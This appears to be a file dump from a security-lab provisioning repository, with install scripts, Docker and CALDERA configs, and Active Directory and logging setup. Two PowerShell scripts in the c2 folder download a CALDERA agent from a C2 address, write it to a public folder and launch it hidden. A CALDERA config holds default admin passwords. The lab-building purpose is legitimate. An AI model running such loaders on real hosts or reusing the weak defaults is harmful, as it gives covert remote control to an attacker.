60 | git clone --branch $RUN_DRUPAL https://github.com/bitnami/bitnami-docker-drupal /opt/bitnami-docker-drupal >> $LOGFILE 2>&1
61 | # Update docker-compose.yml file to download the right docker image tag
62 | sed -i -E "s|image: 'bitnami\/drupal\:.*|image: \'bitnami\/drupal\:$RUN_DRUPAL\'|g" /opt/bitnami-docker-drupal/docker-compose.yml >> $LOGFILE 2>&1
63 | fi
64 |
65 | # Run docker containers in the background
66 | cd /opt/bitnami-docker-drupal && docker-compose -f docker-compose.yml up -d >> $LOGFILE 2>&1
67 |
68 | ## Create SSH Tunnel
69 | # ssh -L 80:127.0.0.1:80 @
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-Logstash.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | # Download and install the Public Signing Key
7 | wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
8 |
9 | apt-get install apt-transport-https
10 |
11 | # Save the repository definition to /etc/apt/sources.list.d/elastic-7.x.list
12 | echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
13 |
14 | # Install Logstash
15 | apt-get update && sudo apt-get install logstash
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-OMS-Auditd-Plugin.sh:
--------------------------------------------------------------------------------
1 | #! /bin/sh
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | usage()
7 | {
8 | echo "usage: $1 [OPTIONS]"
9 | echo "Options:"
10 | echo " "
11 | echo " --install Install the package from the system."
12 | echo " --upgrade Upgrade the package in the system."
13 | echo " -t tag --tag tag Download bundle script from specific GitHub release tag (i.e v2.4.5-44)."
14 | echo " Latest version is installed by default"
15 | echo " -? | -h | --help shows this usage text."
16 | }
17 |
18 | # Extract parameters
19 | while [ $# -ne 0 ]
20 | do
21 | case "$1" in
22 | --install)
23 | installMode="--install"
24 | shift 1
25 | ;;
26 |
27 | --upgrade)
28 | installMode="--upgrade"
29 | shift 1
30 | ;;
31 | -t|--tag)
32 | tagRelease=$2
33 | shift 2
34 | ;;
35 |
36 | -\? | -h | --help)
37 | usage `basename $0` >&2
38 | exit 0
39 | ;;
40 |
41 | *)
42 | echo "Unknown argument: '$1'" >&2
43 | echo "Use -h or --help for usage" >&2
44 | exit 1
45 | ;;
46 | esac
47 | done
48 |
49 | # We need to use sudo for commands in the following block, if not running as root
50 | SUDO=''
51 | if [ "$EUID" != 0 ]; then
52 | SUDO='sudo'
53 | fi
54 |
55 | # Set bundle script to latest GitHub release:
56 | GITHUB_RELEASE_X64=$(curl --silent "https://api.github.com/repos/microsoft/OMS-Auditd-Plugin/releases/latest" | grep -oP '"browser_download_url": "\K(.*.sh)(?=")')
57 | # Output example: https://github.com/microsoft/OMS-Auditd-Plugin/releases/download/v2.4.5-44/auoms-2.4.5-44.universal.x64.sh
58 | BUNDLE_X64=$(basename $GITHUB_RELEASE_X64)
59 | # Output example: auoms-2.4.5-44.universal.x64.sh
60 |
61 | if [ -n "$tagRelease" ]; then
62 | ASSETS_URL=$(curl --silent "https://api.github.com/repos/microsoft/OMS-Auditd-Plugin/releases/tags/$tagRelease" | grep -oP '"assets_url": "\K(.*)(?=")')
63 | GITHUB_RELEASE_X64=$(curl --silent "$ASSETS_URL" | grep -oP '"browser_download_url": "\K(.*.sh)(?=")')
64 | BUNDLE_X64=$(basename $GITHUB_RELEASE_X64)
65 | fi
66 | wget -O ${BUNDLE_X64} ${GITHUB_RELEASE_X64} && $SUDO sh ./${BUNDLE_X64} ${installMode}
67 |
68 | # Copying auoms conf and rules
69 | cp syslog.conf /etc/opt/microsoft/auoms/outconf.d/syslog.conf
70 | cp mstic-research.rules /etc/opt/microsoft/auoms/rules.d
71 |
72 | # Enable AUOMS
73 | sed -i -e 's/active = no/active = yes/' /etc/audisp/plugins.d/auoms.conf
74 |
75 | # Enable the auoms service (will start auoms if it is not running)
76 | /opt/microsoft/auoms/bin/auomsctl enable
77 |
78 | # Restaring OMID and AUOMS
79 | systemctl restart omid
80 | systemctl restart auoms
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-PenPot.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 |
5 | # *********** log tagging variables ***********
6 | INFO_TAG="[INSTALLATION-INFO]"
7 | ERROR_TAG="[INSTALLATION-ERROR]"
8 |
9 | # *********** Set Log File ***************
10 | LOGFILE="/var/log/PenPot-Install.log"
11 | echoerror() {
12 | printf "${RC} * ERROR${EC}: $@\n" 1>&2;
13 | }
14 |
15 | # Install Docker and Docker-Compose
16 | if [[ ! -f Install-Docker.sh ]]; then
17 | wget https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/scripts/bash/Install-Docker.sh >> $LOGFILE 2>&1
18 | chmod +x Install-Docker.sh >> $LOGFILE 2>&1
19 | fi
20 | ./Install-Docker.sh >> $LOGFILE 2>&1
21 |
22 | # Download PenPot Docker Compose File
23 | if [[ ! -f docker-compose.yaml ]]; then
24 | wget https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/scripts/docker/penpot/docker-compose.yaml >> $LOGFILE 2>&1
25 | fi
26 | docker compose -p penpot -f docker-compose.yaml up -d >> $LOGFILE 2>&1
--------------------------------------------------------------------------------
/resources/scripts/bash/install-go-audit.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | # Set environment variables.
7 | export GOROOT=/usr/local
8 | export GOPATH=/go
9 | export PATH=$GOROOT/bin:$GOPATH/bin:$PATH
10 | export NVM_DIR=/usr/local/nvm
11 |
12 | mkdir -p $NVM_DIR
13 |
14 | apt-get update -y
15 | apt-get install -y build-essential git jq auditd
16 | # Download Latest Go
17 | GO_VERSION=$(curl https://golang.org/VERSION?m=text)
18 | curl https://storage.googleapis.com/golang/${GO_VERSION}.linux-amd64.tar.gz | tar xvzf - -C /usr/local --strip-components=1
19 | # Install pre-requisities for go-audit
20 | go get -u github.com/kardianos/govendor
21 | cd go/src/
22 | # Clone go-audit project
23 | git clone https://github.com/slackhq/go-audit.git
24 | cd go-audit
25 | # Build binary
26 | go build
27 | # Copy go-audit yaml
28 | cp go-audit.yaml.example go-audit.yaml
29 | # Copy go-audit binary
30 | cp go-audit /usr/local/bin/
31 | # Download nvm
32 | NVM_VERSION=$(curl -s https://api.github.com/repos/nvm-sh/nvm/releases/latest | grep 'tag_name' | cut -d\" -f4)
33 | curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/${NVM_VERSION}/install.sh | bash
34 | [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
35 | # Installing latest npm LTS
36 | nvm install --lts
37 | npm install -g https://github.com/nbrownus/streamstash#2.0
38 | # Set Note path
39 | export NODE_PATH="$(npm root -g)"
40 | # Stop Auditd Service
41 | service auditd stop
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/2.6.6-040520/docker-compose-caldera.yml:
--------------------------------------------------------------------------------
1 | version: '3.5'
2 |
3 | services:
4 | docker-caldera:
5 | image: cyb3rward0g/docker-caldera:2.6.6-040520
6 | container_name: docker-caldera
7 | restart: always
8 | environment:
9 | CALDERA_RED_ADMIN_NAME: ${CALDERA_RED_ADMIN_NAME}
10 | CALDERA_RED_ADMIN_PASSWORD: ${CALDERA_RED_ADMIN_PASSWORD}
11 | ports:
12 | - "8888:8888"
13 | - "7010:7010/tcp"
14 | - "7010:7010/udp"
15 | - "7012:7012"
16 | networks:
17 | caldera:
18 |
19 | networks:
20 | caldera:
21 | driver: bridge
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/old/Dockerfile:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # Referneces:
5 | # https://github.com/mitre/caldera
6 |
7 | FROM cyb3rward0g/docker-caldera:0.0.1
8 | LABEL maintainer="Roberto Rodriguez @Cyb3rWard0g"
9 | LABEL description="Dockerfile Mordor Caldera"
10 |
11 | USER ${USER}
12 |
13 | RUN cd $CALDERA_HOME/plugins \
14 | #&& git clone https://github.com/d4weiss/evals_caldera.git \
15 | && git clone https://github.com/mitre-attack/evals_caldera.git
16 |
17 | COPY conf/local.yml ${CALDERA_HOME}/conf/local.yml
18 | COPY scripts/caldera-entrypoint.sh ${CALDERA_HOME}/
19 |
20 | USER root
21 |
22 | RUN chmod +x ${CALDERA_HOME}/caldera-entrypoint.sh \
23 | && chown -R ${USER} ${CALDERA_HOME} ${HOME}
24 |
25 | WORKDIR ${CALDERA_HOME}
26 | ENTRYPOINT ["./caldera-entrypoint.sh"]
27 | CMD ["python3", "server.py"]
28 |
29 | USER ${USER}
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/old/conf/a93f6915-a9b8-4a6b-ad46-c072963b32c1.yml:
--------------------------------------------------------------------------------
1 | ---
2 |
3 | id: a93f6915-a9b8-4a6b-ad46-c072963b32c1
4 | name: evals
5 | facts:
6 | - property: remote.file.share
7 | value: \\FILE001\secrets
8 | - property: remote.file.name
9 | value: ring.txt
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/old/conf/local.yml:
--------------------------------------------------------------------------------
1 | api_key_blue: BLUEADMIN123
2 | api_key_red: ADMIN123
3 | encryption_key: ADMIN123
4 | app.contact.gist: API_KEY
5 | app.contact.html: /weather
6 | app.contact.http: http://127.0.0.1:8888
7 | app.contact.tcp: 127.0.0.1:7010
8 | app.contact.udp: 127.0.0.1:7011
9 | app.contact.websocket: 127.0.0.1:7012
10 | crypt_salt: REPLACE_WITH_RANDOM_VALUE
11 | exfil_dir: /tmp
12 | plugins:
13 | - sandcat
14 | - mock
15 | - stockpile
16 | - response
17 | - compass
18 | - caltack
19 | - ssl
20 | - atomic
21 | - gameboard
22 | - human
23 | - training
24 | - access
25 | - manx
26 | - evals_caldera
27 | port: 8888
28 | reports_dir: /tmp
29 | users:
30 | blue:
31 | blue: admin
32 | red:
33 | admin: admin
34 | red: admin
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/old/docker-compose-caldera.yml:
--------------------------------------------------------------------------------
1 | version: '3.5'
2 |
3 | services:
4 | mordor-caldera:
5 | image: cyb3rward0g/mordor-caldera:0.0.1
6 | container_name: mordor-caldera
7 | volumes:
8 | - ./config/a93f6915-a9b8-4a6b-ad46-c072963b32c1.yml:/opt/Caldera/plugins/evals_caldera/data/facts/a93f6915-a9b8-4a6b-ad46-c072963b32c1.yml
9 | - ./config/local.yml:/opt/Caldera/conf/local.yml
10 | restart: always
11 | ports:
12 | - "80:80"
13 | - "443:443"
14 | - "8888:8888"
15 | networks:
16 | caldera:
17 |
18 | networks:
19 | caldera:
20 | driver: bridge
21 |
--------------------------------------------------------------------------------
/resources/scripts/docker/neo4j/Dockerfile:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 |
3 | FROM neo4j:5.8.0
4 |
5 | ENV APOC_VERSION=5.8.0
6 |
7 | ENV NEO4J_apoc_export_file_enabled=true
8 | ENV NEO4J_apoc_import_file_enabled=true
9 | ENV NEO4J_apoc_import_file_use__neo4j__config=true
10 | ENV NEO4J_PLUGINS=\[\"apoc\"\]
11 | ENV NEO4J_dbms_security_procedures_unrestricted=apoc.\\\*
12 |
13 | ADD https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/${APOC_VERSION}/apoc-${APOC_VERSION}-extended.jar $NEO4J_HOME/plugins/
14 |
15 | RUN chmod a+r $NEO4J_HOME/plugins/apoc-${APOC_VERSION}-extended.jar
16 |
17 | # docker run -it -d --rm --name neo4j -p 7474:7474 -p 7687:7687 -e NEO4J_AUTH=none neo4j-apoc
--------------------------------------------------------------------------------
/resources/scripts/docker/nginx/Dockerfile:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | FROM nginx:1.25.1
5 | LABEL maintainer="Roberto Rodriguez @Cyb3rWard0g"
6 |
7 | ENV DEBIAN_FRONTEND noninteractive
8 |
9 | # *********** Installing Prerequisites ***************
10 | # -qq : No output except for errors
11 | RUN echo "Updating Ubuntu base image.." \
12 | && apt-get update -qq
13 | RUN apt-get install -qqy curl
14 | RUN apt-get -qy clean \
15 | autoremove
16 |
17 | # *********** Adding and files to Container ***************
18 | COPY scripts/nginx-entrypoint.sh /opt/scripts/
19 | RUN chmod +x /opt/scripts/nginx-entrypoint.sh
20 |
21 | # *********** RUN Nginx ***************
22 | EXPOSE 80 443
23 | WORKDIR "/opt/scripts/"
24 | ENTRYPOINT ["./nginx-entrypoint.sh"]
--------------------------------------------------------------------------------
/resources/scripts/docker/nginx/scripts/nginx-entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | _term() {
7 | echo "Terminating Nginx Services"
8 | service nginx stop
9 | exit 0
10 | }
11 | trap _term SIGTERM
12 |
13 | # ************* Creating Certificate ***********
14 | openssl req \
15 | -x509 \
16 | -nodes \
17 | -days 365 \
18 | -newkey rsa:2048 \
19 | -keyout /etc/ssl/private/Nginx.key \
20 | -out /etc/ssl/certs/Nginx.crt \
21 | -subj "/C=US/ST=VA/L=VA/O=Nginx/OU=Ngnix Nginx/CN=Nginx"
22 |
23 | echo "Starting remaining services.."
24 | service nginx restart
25 |
26 | echo "Pushing Nginx Logs to console.."
27 | tail -f /var/log/nginx/*.log
--------------------------------------------------------------------------------
/resources/scripts/powershell/active-directory/Create-SecurityGroup.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 |
6 | [CmdletBinding()]
7 | param (
8 | [Parameter(Mandatory=$true)]
9 | [string]$SecurityGroup,
10 |
11 | [Parameter(Mandatory=$true)]
12 | [string]$domainFQDN
13 | )
14 |
15 | $ErrorActionPreference = "Stop"
16 |
17 | $DomainName1,$DomainName2 = $domainFQDN.split('.')
18 |
19 | $ParentPath = "DC=$DomainName1,DC=$DomainName2"
20 |
21 | write-host "Creating Security Group $SecurityGroup on $ParentPath .."
22 | New-ADGroup -Name $SecurityGroup -GroupCategory Security -GroupScope Global `
23 | -DisplayName "$SecurityGroup" -Path "CN=Users,$ParentPath" `
24 | -Description "Security group $SecurityGroup" -PassThru
--------------------------------------------------------------------------------
/resources/scripts/powershell/active-directory/Deploy-Forest.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | # https://github.com/MicrosoftDocs/windowsserverdocs/blob/master/WindowsServerDocs/identity/ad-ds/deploy/Install-a-New-Windows-Server-2012-Active-Directory-Forest--Level-200-.md
6 | # https://stackoverflow.com/a/4409448
7 | # https://github.com/aws-quickstart/quickstart-microsoft-activedirectory/tree/master/scripts/archive
8 |
9 | [CmdletBinding()]
10 | param (
11 | [Parameter(Mandatory=$true)]
12 | [string]$domainFQDN,
13 |
14 | [Parameter(Mandatory=$true)]
15 | [string]$DomainNetBiosName,
16 |
17 | [Parameter(Mandatory=$true)]
18 | [SecureString]$SafeModeAdministratorPassword
19 | )
20 |
21 | # Create New Forest, add Domain Controller
22 | $host_info = gwmi win32_computersystem
23 |
24 | if (($host_info).partofdomain -eq $true)
25 | {
26 | $hostname = ($host_info).Name
27 | $domain_name = ($host_info).Domain
28 |
29 | write-host -fore red "$hostname is already part of the $domain_name domain"
30 | write-host -fore red "$hostname cannot be used to create a new forest"
31 | }
32 | else
33 | {
34 | write-host -fore green "$hostname is not part of a domain yet.."
35 | write-host -fore green "Deploying a new forest and promoting $hostname to Domain Controller.."
36 |
37 | # Windows Features Installation
38 | Get-Command -module ServerManager
39 | write-host -fore green "Installing Windows features:"
40 | $windows_features = @("AD-Domain-Services", "DNS")
41 | $windows_features.ForEach({
42 | write-host -fore yellow "Installing $_ Windows feature.."
43 | Install-WindowsFeature -name $_ -IncludeManagementTools
44 | })
45 |
46 | # Microsoft Windows Server 2016 Standard Evaluation
47 | # Creating New Forest
48 | Import-Module ADDSDeployment
49 |
50 | Install-ADDSForest `
51 | -SafeModeAdministratorPassword $SafeModeAdministratorPassword `
52 | -CreateDnsDelegation:$false `
53 | -DatabasePath "C:\Windows\NTDS" `
54 | -DomainMode "Default" `
55 | -DomainName $domainFQDN `
56 | -DomainNetbiosName $DomainNetBiosName `
57 | -ForestMode "Default" `
58 | -InstallDns:$true `
59 | -LogPath "C:\Windows\NTDS" `
60 | -NoRebootOnCompletion:$true `
61 | -SysvolPath "C:\Windows\SYSVOL" `
62 | -Force:$true
63 |
64 | Start-Sleep -Seconds 5
65 | Restart-Computer -Force
66 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/active-directory/New-NetworkShares.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | # https://ilovepowershell.com/2012/09/19/create-network-share-with-powershell-3/
6 | # https://lotr.fandom.com/wiki/Ring-inscription
7 |
8 | [CmdletBinding()]
9 | param (
10 | [Parameter(Mandatory=$true)]
11 | [string]$domainFQDN
12 | )
13 |
14 | $ErrorActionPreference = "Stop"
15 |
16 | $DomainName1,$DomainName2 = $domainFQDN.split('.')
17 |
18 | $folders = @("secrets", "gates")
19 |
20 | foreach($folder in $folders)
21 | {
22 | New-Item C:\$folder -type directory
23 | if($folder -Like "secrets")
24 | {
25 | New-SMBShare -Name "secrets" -Path "C:\secrets" `
26 | -FullAccess "$DomainName1\Domain Admins"
27 | }
28 | else
29 | {
30 | New-SMBShare -Name "gates" -Path "C:\gates" `
31 | -FullAccess "$DomainName1\Domain Admins" `
32 | -ReadAccess "$DomainName1\Domain Users"
33 | }
34 | }
35 |
36 | # Create secret file
37 | Write-Output "One Ring to rule them all, One ring to find them; One ring to bring them all and in the darkness bind them" > C:\secrets\ring.txt
--------------------------------------------------------------------------------
/resources/scripts/powershell/active-directory/Set-OUs.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | # https://www.itprotoday.com/windows-78/create-large-number-ous-set-structure-and-delegation
6 |
7 | [CmdletBinding()]
8 | param (
9 | [Parameter(Mandatory=$true)]
10 | [string]$domainFQDN
11 | )
12 |
13 | # Verifying ADWS service is running
14 | $ServiceName = 'ADWS'
15 | $arrService = Get-Service -Name $ServiceName
16 |
17 | while ($arrService.Status -ne 'Running')
18 | {
19 | Start-Service $ServiceName
20 | write-host $arrService.status
21 | write-host 'Service starting'
22 | Start-Sleep -seconds 5
23 | $arrService.Refresh()
24 | if ($arrService.Status -eq 'Running')
25 | {
26 | Write-Host 'Service is now Running'
27 | }
28 | }
29 |
30 | $DomainName1,$DomainName2 = $domainFQDN.split('.')
31 |
32 | $ParentPath = "DC=$DomainName1,DC=$DomainName2"
33 | $OUS = @(("Workstations","Workstations in the domain"),("Servers","Servers in the domain"),("LogCollectors","Servers collecting event logs"),("DomainUsers","Users in the domain"))
34 |
35 | foreach($OU in $OUS)
36 | {
37 | #Check if exists, if it does skip
38 | [string] $Path = "OU=$($OU[0]),$ParentPath"
39 | write-host "Checking to see if $Path exists or not"
40 | if(![adsi]::Exists("LDAP://$Path"))
41 | {
42 | write-host "Creating OU $OU .."
43 | New-ADOrganizationalUnit -Name $OU[0] -Path $ParentPath `
44 | -Description $OU[1] `
45 | -ProtectedFromAccidentalDeletion $false -PassThru
46 | }
47 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/auditing/Configure-WEF-Client.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # References:
5 | # https://github.com/zulu8/Blue/blob/master/Deploy-Blue.ps1
6 | # https://support.microsoft.com/en-us/help/921468/security-auditing-settings-are-not-applied-to-windows-vista-based-and
7 |
8 | [CmdletBinding()]
9 | param (
10 | [Parameter(Mandatory=$true)]
11 | [string]$domainFQDN,
12 |
13 | [Parameter(Mandatory=$true)]
14 | [string]$WECNetBIOSName
15 | )
16 |
17 | # Enable WinRM if it is not enabled
18 | $ServiceName = 'WinRM'
19 | $arrService = Get-Service -Name $ServiceName
20 |
21 | if ($arrService.Status -eq 'Running')
22 | {
23 | Write-Host "$ServiceName Service is now Running"
24 | }
25 | else
26 | {
27 | Write-host 'Enabling WinRM..'
28 | winrm quickconfig -q
29 | write-Host "Setting WinRM to start automatically.."
30 | & sc.exe config WinRM start= auto
31 | }
32 |
33 | # Grant the Network Service account READ access to the event log by appending (A;;0x1;;;NS)
34 | write-Host "Granting the Network Service account READ access to the Security event log.."
35 | wevtutil set-log security /ca:'O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)'
36 |
37 | # WEC Server
38 | $WECFQDN = $WECNetBIOSName+"."+$domainFQDN
39 |
40 | # WEF/WEC Registry Entry
41 | $regKey = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager"
42 | if(!(Test-Path $regKey)){Write-Host $regKey " does not exist.."
43 | New-Item $regKey -Force
44 | }
45 | Write-Host "Setting " $regKey
46 | New-ItemProperty -Path $regKey -Name 1 -Value "Server=http://$WECFQDN`:5985/wsman/SubscriptionManager/WEC,Refresh=60" -PropertyType "String" -force
47 |
48 | # Adding the Network Service to the Event Log Readers group
49 | write-Host "Adding Network Service to Event Log Readers restricted group.."
50 | Add-LocalGroupMember -Group "Event Log Readers" -Member "Network Service"
51 | # net.exe localgroup "Event Log Readers" "Network Service" /add
52 |
53 | Restart-Service WinRM
54 |
55 | $ServiceName = 'WinRM'
56 | $arrService = Get-Service -Name $ServiceName
57 |
58 | while ($arrService.Status -ne 'Running')
59 | {
60 | Start-Service $ServiceName
61 | write-host $arrService.status
62 | write-host "$ServiceName Service starting"
63 | Start-Sleep -seconds 5
64 | $arrService.Refresh()
65 | if ($arrService.Status -eq 'Running')
66 | {
67 | Write-Host "$ServiceName Service is now Running"
68 | }
69 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/auditing/Enable-PowerShell-Logging.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # Enable PowerShell Logging
5 | $regConfig = @"
6 | regKey,name,value,type
7 | "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging","EnableScriptBlockLogging",1,"DWORD"
8 | "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging","EnableScriptBlockInvocationLogging",1,"DWORD"
9 | "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging","EnableModuleLogging",1,"DWORD"
10 | "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames",*,*,"String"
11 | "@
12 |
13 | Write-host "Setting up PowerShell registry settings.."
14 | $regConfig | ConvertFrom-Csv | ForEach-Object {
15 | if(!(Test-Path $_.regKey)){
16 | Write-Host $_.regKey " does not exist.."
17 | New-Item $_.regKey -Force
18 | }
19 | Write-Host "Setting " $_.regKey
20 | New-ItemProperty -Path $_.regKey -Name $_.name -Value $_.value -PropertyType $_.type -force
21 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/auditing/Set-AuditSAMRemoteCalls.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | # Reference:
5 | # https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-clients-allowed-to-make-remote-sam-calls
6 |
7 | $regConfig = @"
8 | regKey,name,value,type
9 | "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa","restrictremotesam","O:BAG:BAD:(A;;RC;;;BA)","String"
10 | "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa","RestrictRemoteSamAuditOnlyMode",1,"DWord"
11 | "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa","RestrictRemoteSamEventThrottlingWindow",0,"DWord"
12 | "@
13 |
14 | Write-host "Setting up Registry keys for additional settings.."
15 | $regConfig | ConvertFrom-Csv | ForEach-Object {
16 | if(!(Test-Path $_.regKey)){
17 | Write-Host $_.regKey " does not exist.."
18 | New-Item $_.regKey -Force
19 | }
20 | Write-Host "Setting " $_.regKey
21 | New-ItemProperty -Path $_.regKey -Name $_.name -Value $_.value -PropertyType $_.type -force
22 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/azure-active-directory/Get-DeviceCode.ps1:
--------------------------------------------------------------------------------
1 | function Get-DeviceCode {
2 | <#
3 | .SYNOPSIS
4 | A PowerShell script to get a device code to initiate authentication.
5 |
6 | Author: Roberto Rodriguez (@Cyb3rWard0g)
7 | License: MIT
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | .DESCRIPTION
12 | Get-DeviceCode is a simple PowerShell to get a device code for a specific Azure AD application to initiate authentication.
13 |
14 | .PARAMETER ClientId
15 | The Application (client) ID assigned to the Azure AD application.
16 |
17 | .PARAMETER TenantId
18 | Tenant ID. Can be /common, /consumers, or /organizations. It can also be the directory tenant that you want to request permission from in GUID or friendly name format.
19 |
20 | .PARAMETER Scope
21 | A space-separated list of scopes that you want the user to consent to.
22 |
23 | .LINK
24 | https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-device-code#:~:text=The%20device%20code%20flow%20is%20a%20polling%20protocol,hasn%27t%20finished%20authenticating%2C%20but%20hasn%27t%20canceled%20the%20flow.
25 |
26 | #>
27 |
28 | [cmdletbinding()]
29 | Param(
30 | [Parameter(Mandatory = $true)]
31 | [String]$ClientId,
32 | [Parameter(Mandatory = $false)]
33 | [string]$TenantId,
34 | [Parameter(Mandatory = $true)]
35 | [string]$Scope
36 | )
37 | # Force TLS 1.2
38 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
39 |
40 | # Device authorization request
41 | # Authentication server for a device
42 | if (!$TenantId){
43 | $TenantId = 'organizations'
44 | }
45 | $headers = @{
46 | 'Content-Type' = 'application/x-www-form-urlencoded'
47 | }
48 | $body = @{
49 | client_id = $ClientId
50 | scope = $Scope
51 | }
52 | $Params = @{
53 | Headers = $headers
54 | uri = "https://login.microsoftonline.com/$TenantId/oauth2/v2.0/devicecode"
55 | Body = $body
56 | method = 'Post'
57 | }
58 | $request = Invoke-RestMethod @Params
59 |
60 | # Process authorization request
61 | if(-not $request.device_code)
62 | {
63 | throw "Device Code Flow failed"
64 | }
65 | else{
66 | $request
67 | }
68 | }
--------------------------------------------------------------------------------
/resources/scripts/powershell/c2/Invoke-Manx.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | [CmdletBinding()]
5 | param(
6 | [Parameter(Mandatory=$true)]
7 | [string]$C2IPAddress
8 | )
9 |
10 | if ($host.Version.Major -ge 3)
11 | {
12 | $ErrAction= "ignore"
13 | }
14 | else
15 | {
16 | $ErrAction= "SilentlyContinue"
17 | }
18 | $server="http://$C2IPAddress`:8888"
19 | $socket="$C2IPAddress`:7010"
20 | $contact="tcp"
21 | $url="$server/file/download"
22 | $wc=New-Object System.Net.WebClient
23 | $wc.Headers.add("platform","windows")
24 | $wc.Headers.add("file","manx.go")
25 | $data=$wc.DownloadData($url)
26 | $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")
27 | Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction
28 | rm -force "C:\Users\Public\$name.exe" -ea $ErrAction;([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null
29 |
30 | Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact tcp" -WindowStyle hidden
--------------------------------------------------------------------------------
/resources/scripts/powershell/c2/invoke-sandcat.ps1:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 |
4 | [CmdletBinding()]
5 | param(
6 | [Parameter(Mandatory=$true)]
7 | [string]$C2IPAddress
8 | )
9 |
10 | $server="http://$C2IPAddress`:8888"
11 | $url="$server/file/download"
12 | $wc=New-Object System.Net.WebClient
13 | $wc.Headers.add("platform","windows")
14 | $wc.Headers.add("file","sandcat.go")
15 | $data=$wc.DownloadData($url)
16 | $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")
17 | get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f
18 | rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null
19 |
20 | Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/active-directory/Create-AD.zip:
--------------------------------------------------------------------------------
